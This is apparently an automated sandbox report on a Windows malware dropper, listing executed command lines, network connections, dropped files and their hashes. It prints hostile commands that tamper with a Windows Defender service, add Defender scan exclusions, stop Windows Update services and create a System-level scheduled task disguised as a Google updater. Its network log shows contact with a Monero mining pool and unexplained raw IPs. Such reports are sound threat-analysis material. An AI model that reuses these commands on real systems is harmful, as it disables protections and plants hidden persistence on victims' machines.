cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10260 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Roaming\htsahur

C:\Users\Admin\AppData\Roaming\htsahur

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 254.105.26.67.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 157.240.201.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 store.steampowered.com udp
NL 104.85.0.101:443 store.steampowered.com tcp
US 8.8.8.8:53 www.epicgames.com udp
US 52.0.122.33:443 www.epicgames.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 104.244.42.1:443 twitter.com tcp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 pbs.twimg.com udp
US 8.8.8.8:53 api.twitter.com udp
NL 199.232.148.159:443 pbs.twimg.com tcp
US 8.8.8.8:53 video.twimg.com udp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 199.232.148.158:443 video.twimg.com tcp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 104.244.42.130:443 api.twitter.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 t.co udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 104.244.42.133:443 t.co tcp
US 8.8.8.8:53 analytics.twitter.com udp
US 104.244.42.131:443 analytics.twitter.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
US 8.8.8.8:53 33.122.0.52.in-addr.arpa udp
US 8.8.8.8:53 1.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 158.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 159.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 130.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 131.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 133.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 92.47.239.18.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
NL 88.221.25.153:80 apps.identrust.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 tracking.epicgames.com udp
US 54.82.162.139:443 tracking.epicgames.com tcp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 169.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 153.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 171.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 139.162.82.54.in-addr.arpa udp
US 8.8.8.8:53 22.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
NL 216.58.214.22:443 i.ytimg.com tcp
US 8.8.8.8:53 www.paypalobjects.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 22.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
IE 163.70.151.35:443 facebook.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 www.recaptcha.net udp
NL 142.250.179.163:443 www.recaptcha.net tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 163.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com udp
US 104.17.208.240:443 zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com tcp
NL 142.250.179.163:443 www.recaptcha.net udp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 240.208.17.104.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 t.paypal.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.250.179.206:443 play.google.com tcp
NL 142.250.179.206:443 play.google.com udp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 login.steampowered.com udp
JP 23.207.106.113:443 login.steampowered.com tcp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
NL 194.169.175.118:80 194.169.175.118 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
NL 104.85.0.101:443 store.steampowered.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
JP 23.207.106.113:443 login.steampowered.com tcp
US 104.244.42.130:443 api.twitter.com tcp
US 104.244.42.130:443 api.twitter.com tcp
FI 77.91.124.86:19084 tcp
NL 216.58.214.22:443 i.ytimg.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.194:443 googleads.g.doubleclick.net tcp
NL 142.250.179.194:443 googleads.g.doubleclick.net udp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.96.0:80 stim.graspalace.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 api.steampowered.com udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
JP 23.207.106.113:443 api.steampowered.com tcp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
NL 142.250.179.138:443 jnn-pa.googleapis.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
NL 142.251.36.6:443 static.doubleclick.net tcp
NL 142.250.179.138:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 138.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
US 149.40.62.171:15666 tcp
US 8.8.8.8:53 171.62.40.149.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
NL 142.250.179.142:443 youtube.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 64.185.227.156:443 api.ipify.org tcp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
IT 185.196.9.171:80 185.196.9.171 tcp
US 8.8.8.8:53 156.227.185.64.in-addr.arpa udp
US 8.8.8.8:53 171.9.196.185.in-addr.arpa udp
NL 194.169.175.235:42691 tcp
US 194.49.94.11:80 194.49.94.11 tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 235.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 11.94.49.194.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
NL 142.250.179.206:443 play.google.com udp
US 8.8.8.8:53 31.12.26.104.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 sentry.io udp
US 35.186.247.156:443 sentry.io tcp
US 8.8.8.8:53 156.247.186.35.in-addr.arpa udp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
US 35.186.247.156:443 sentry.io udp
US 8.8.8.8:53 play.google.com udp
NL 142.250.179.206:443 play.google.com udp
US 8.8.8.8:53 www.recaptcha.net udp
NL 142.250.179.163:443 www.recaptcha.net udp
NL 142.250.179.163:443 www.recaptcha.net tcp
US 8.8.8.8:53 www.paypalobjects.com udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 b6be6573-ba10-457a-b18c-3b8d774329de.uuid.statsexplorer.org udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 talon-website-prod.ecosec.on.epicgames.com udp
US 172.64.146.120:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 120.146.64.172.in-addr.arpa udp
US 8.8.8.8:53 server13.statsexplorer.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.stunprotocol.org udp
BG 185.82.216.108:443 server13.statsexplorer.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp
US 8.8.8.8:53 talon-service-prod.ecosec.on.epicgames.com udp
US 172.64.146.120:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 172.64.146.120:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 172.64.146.120:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.218.90:443 js.hcaptcha.com tcp
US 8.8.8.8:53 90.218.19.104.in-addr.arpa udp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 api2.hcaptcha.com udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
BG 185.82.216.108:443 server13.statsexplorer.org tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.39.98:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 hcaptcha.com udp
US 8.8.8.8:53 98.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 51.68.143.81:14433 xmr-eu1.nanopool.org tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 81.143.68.51.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 118.34.255.51.in-addr.arpa udp
US 8.8.8.8:53 stun.sipgate.net udp
US 3.33.249.248:3478 stun.sipgate.net udp
US 8.8.8.8:53 248.249.33.3.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe

MD5 d703218b664522433f4d04123036bc67
SHA1 05b55b0a5d5fb19fdda795adba44372384e80e22
SHA256 70e75a912cfb67015a5569fac1f8cc7abec2471700e82e73b5e8c95ae25cea63
SHA512 98ee45a6a49aa3fb0848ee5c863f5ad1b273164055db82fcf9d88bfae988e98aaea8e26345a362c925600ecbfd9e657cc6e5767783da78f8a5131073415fff69

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe

MD5 d703218b664522433f4d04123036bc67
SHA1 05b55b0a5d5fb19fdda795adba44372384e80e22
SHA256 70e75a912cfb67015a5569fac1f8cc7abec2471700e82e73b5e8c95ae25cea63
SHA512 98ee45a6a49aa3fb0848ee5c863f5ad1b273164055db82fcf9d88bfae988e98aaea8e26345a362c925600ecbfd9e657cc6e5767783da78f8a5131073415fff69

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe

MD5 4a062352e017fe64b6f7eaa03a0d0456
SHA1 8d5bb6ab5f8c9fb71d4dede267864eca7f298d6f
SHA256 da31a3caa75d8ff34741eb296daee54ffaf938e4efde7d2f4b720a01c9c9268d
SHA512 08838ef09ede829b949d18ad8c975c5f9c1dfcdc7cd6b5fd6119ca4487bfccd9593f12ca692e8f7e038ac9906faa6c0cff60ad74c21a0227855dfaaf80429bbd

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe

MD5 4a062352e017fe64b6f7eaa03a0d0456
SHA1 8d5bb6ab5f8c9fb71d4dede267864eca7f298d6f
SHA256 da31a3caa75d8ff34741eb296daee54ffaf938e4efde7d2f4b720a01c9c9268d
SHA512 08838ef09ede829b949d18ad8c975c5f9c1dfcdc7cd6b5fd6119ca4487bfccd9593f12ca692e8f7e038ac9906faa6c0cff60ad74c21a0227855dfaaf80429bbd

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe

MD5 0bcbb2a8459c76904d8f1b4001c6994b
SHA1 341968ddc448b68c47c0a5b7064d84f5ecc4ed0f
SHA256 1a19a4b6cfbd1a34eb34ff3f67518bcccc6392da2642caf50996d5dcc5953d85
SHA512 a5a4d6aeffe8be185e20fc0e9eca335112642701fe12302776d00ded4cd75f78f61fb2fb973dd8f3f92bdedb5b20bcf94c2d2a3b38d4cfef98fabff364f4794d

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe

MD5 0bcbb2a8459c76904d8f1b4001c6994b
SHA1 341968ddc448b68c47c0a5b7064d84f5ecc4ed0f
SHA256 1a19a4b6cfbd1a34eb34ff3f67518bcccc6392da2642caf50996d5dcc5953d85
SHA512 a5a4d6aeffe8be185e20fc0e9eca335112642701fe12302776d00ded4cd75f78f61fb2fb973dd8f3f92bdedb5b20bcf94c2d2a3b38d4cfef98fabff364f4794d

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe

MD5 b4b91b78bfd02f0c100c2da6b53480d4
SHA1 e1263532cb98ae705a8b2ec5f11419038e8a10b1
SHA256 691e14c69fcd164d1ee43521d45274f24ce0022cab3250eae6b31a1d224b0292
SHA512 09f889de05d8bf31deebaa0aeffc6762743a40b9ba946faa3777161cdc56e35341117d87bcf75d97ab1109a5be1e9be362024676efe6a270170f23eefb1af542

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe

MD5 b4b91b78bfd02f0c100c2da6b53480d4
SHA1 e1263532cb98ae705a8b2ec5f11419038e8a10b1
SHA256 691e14c69fcd164d1ee43521d45274f24ce0022cab3250eae6b31a1d224b0292
SHA512 09f889de05d8bf31deebaa0aeffc6762743a40b9ba946faa3777161cdc56e35341117d87bcf75d97ab1109a5be1e9be362024676efe6a270170f23eefb1af542

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe

MD5 2bfe0d06f166f617416c7efef925a083
SHA1 efc9a0a8a97d1e727ef37fb7d28f395cd658e9af
SHA256 3916a3f1b69d307cea04e96d6d7b508ae7e61dfbdde35395f928dc1707c4e04e
SHA512 a52d708f351bb251c401074f5f931c3a2e08777fc027d244180b97aad971f816c5d46aa7f86aa4b75608bee539dd64cf9c33ee0b6b390b592616e9937dfe20cc

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe

MD5 2bfe0d06f166f617416c7efef925a083
SHA1 efc9a0a8a97d1e727ef37fb7d28f395cd658e9af
SHA256 3916a3f1b69d307cea04e96d6d7b508ae7e61dfbdde35395f928dc1707c4e04e
SHA512 a52d708f351bb251c401074f5f931c3a2e08777fc027d244180b97aad971f816c5d46aa7f86aa4b75608bee539dd64cf9c33ee0b6b390b592616e9937dfe20cc

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe

MD5 d24f8149554a23ba7927cad3fe2f2130
SHA1 b59ae171270f45a8fe33d72f38028cead4ccc64e
SHA256 7cfcfc2800c81b13a46a5ca9f5e3667db14ae10e4c8087dc115d186ede8c0da1
SHA512 9689c76c35b68fb7ec5f84ec9ceb466f913ad64ae74baac1f48fd8acbbdb257b055774169aecc409a457d0f5eebaadfda078cba3c34e5f0f55afb3c9c20b0446

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe

MD5 d24f8149554a23ba7927cad3fe2f2130
SHA1 b59ae171270f45a8fe33d72f38028cead4ccc64e
SHA256 7cfcfc2800c81b13a46a5ca9f5e3667db14ae10e4c8087dc115d186ede8c0da1
SHA512 9689c76c35b68fb7ec5f84ec9ceb466f913ad64ae74baac1f48fd8acbbdb257b055774169aecc409a457d0f5eebaadfda078cba3c34e5f0f55afb3c9c20b0446

memory/1220-42-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe

MD5 29217ddffa3effb07cca73a0f335e0d5
SHA1 de079ac8c4457c3354594b6b177c95b3082de568
SHA256 8cf009e6e26bf65c5143b55645365d9b1fb835e0aeec33f33579f2ab33cba5bc
SHA512 e6b2cc1379a7dcba9058b6c0453d8450bf0afb824c2fb1759aee62b1a5cb10149eb7123e81a2a72e21cfcd7356513b2ea4bc5566d675e2ea2839329cfdf0b821

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe

MD5 29217ddffa3effb07cca73a0f335e0d5
SHA1 de079ac8c4457c3354594b6b177c95b3082de568
SHA256 8cf009e6e26bf65c5143b55645365d9b1fb835e0aeec33f33579f2ab33cba5bc
SHA512 e6b2cc1379a7dcba9058b6c0453d8450bf0afb824c2fb1759aee62b1a5cb10149eb7123e81a2a72e21cfcd7356513b2ea4bc5566d675e2ea2839329cfdf0b821

memory/1220-46-0x0000000074A10000-0x00000000751C0000-memory.dmp

memory/3820-47-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe

MD5 d2d5c305540b19582d0fa7bce1991547
SHA1 537c1268393479ab57fc36d3437cf2add7f41639
SHA256 a085fa88baf6194f4e7e64f0cdfc28f1819157a4ab68114fe7be861811dd523f
SHA512 165beb24a516852b10d3bf86495ba7da847e2e0575eb56255da33a78b6f646e2c8afcfd3570c6abec8a377e137721fc1067117d2e6f89fdbc6f61e51f68dfb5c

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe

MD5 d2d5c305540b19582d0fa7bce1991547
SHA1 537c1268393479ab57fc36d3437cf2add7f41639
SHA256 a085fa88baf6194f4e7e64f0cdfc28f1819157a4ab68114fe7be861811dd523f
SHA512 165beb24a516852b10d3bf86495ba7da847e2e0575eb56255da33a78b6f646e2c8afcfd3570c6abec8a377e137721fc1067117d2e6f89fdbc6f61e51f68dfb5c

memory/3820-53-0x0000000000400000-0x0000000000434000-memory.dmp

memory/884-52-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3820-55-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3820-50-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3136-56-0x0000000000BA0000-0x0000000000BB6000-memory.dmp

memory/884-57-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe

MD5 220ba5e7fa29452baff88741613e2432
SHA1 d38dc5eb09b403dc42228ed604d1dfd5c678a743
SHA256 b8bdfa1a37acde333a8c34ed8a95b214592d11a393f111808ac16893e6820107
SHA512 966dabbca29aebb3866087e21075a866ae7596025f6b87dbd88636e3bf817be431d6da727b1b219055adcc2928d2b70a8e92ca3cb30cad04e8b02584260dd337

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe

MD5 220ba5e7fa29452baff88741613e2432
SHA1 d38dc5eb09b403dc42228ed604d1dfd5c678a743
SHA256 b8bdfa1a37acde333a8c34ed8a95b214592d11a393f111808ac16893e6820107
SHA512 966dabbca29aebb3866087e21075a866ae7596025f6b87dbd88636e3bf817be431d6da727b1b219055adcc2928d2b70a8e92ca3cb30cad04e8b02584260dd337

memory/1104-63-0x0000000000400000-0x000000000043E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe

MD5 d7414deed28382ac271a868d929d0ea8
SHA1 3c59660bd79612724f482b7a682ff87d54a3fb1c
SHA256 35937f30394331205ac6c7cedc174e495610d366af221c93572a4cf30445b507
SHA512 0c5fd3ba3829d56a6241390d124548deaaaaba27baad692fbf1ef766e786b0e35f947af752df8c8abe5de15742982a62034911ff67eb6943fa6cc4a3d302c354

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe

MD5 d7414deed28382ac271a868d929d0ea8
SHA1 3c59660bd79612724f482b7a682ff87d54a3fb1c
SHA256 35937f30394331205ac6c7cedc174e495610d366af221c93572a4cf30445b507
SHA512 0c5fd3ba3829d56a6241390d124548deaaaaba27baad692fbf1ef766e786b0e35f947af752df8c8abe5de15742982a62034911ff67eb6943fa6cc4a3d302c354

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 d7414deed28382ac271a868d929d0ea8
SHA1 3c59660bd79612724f482b7a682ff87d54a3fb1c
SHA256 35937f30394331205ac6c7cedc174e495610d366af221c93572a4cf30445b507
SHA512 0c5fd3ba3829d56a6241390d124548deaaaaba27baad692fbf1ef766e786b0e35f947af752df8c8abe5de15742982a62034911ff67eb6943fa6cc4a3d302c354

memory/1104-69-0x0000000074A10000-0x00000000751C0000-memory.dmp

memory/1104-70-0x00000000078B0000-0x0000000007E54000-memory.dmp

memory/1104-71-0x00000000073A0000-0x0000000007432000-memory.dmp

memory/1220-78-0x0000000074A10000-0x00000000751C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 d7414deed28382ac271a868d929d0ea8
SHA1 3c59660bd79612724f482b7a682ff87d54a3fb1c
SHA256 35937f30394331205ac6c7cedc174e495610d366af221c93572a4cf30445b507
SHA512 0c5fd3ba3829d56a6241390d124548deaaaaba27baad692fbf1ef766e786b0e35f947af752df8c8abe5de15742982a62034911ff67eb6943fa6cc4a3d302c354

memory/1104-81-0x0000000007590000-0x00000000075A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 d7414deed28382ac271a868d929d0ea8
SHA1 3c59660bd79612724f482b7a682ff87d54a3fb1c
SHA256 35937f30394331205ac6c7cedc174e495610d366af221c93572a4cf30445b507
SHA512 0c5fd3ba3829d56a6241390d124548deaaaaba27baad692fbf1ef766e786b0e35f947af752df8c8abe5de15742982a62034911ff67eb6943fa6cc4a3d302c354

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe

MD5 116616b35c9e63fde703d5b88eb2fb3f
SHA1 36019fa237f5e97471878fa697176fdfda33b1d9
SHA256 f6de88edf376e7daec9a84b06afdd7b64f931c8053ed8413afcb236335f5bc9d
SHA512 6bc84e24ef77918ed5bf52009098666b6f862230173d6ae4383b663c40aec3caf10253f5b7b0d355254301448b69b547d85d51ad058433380dcbf34beefc3c0f

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe

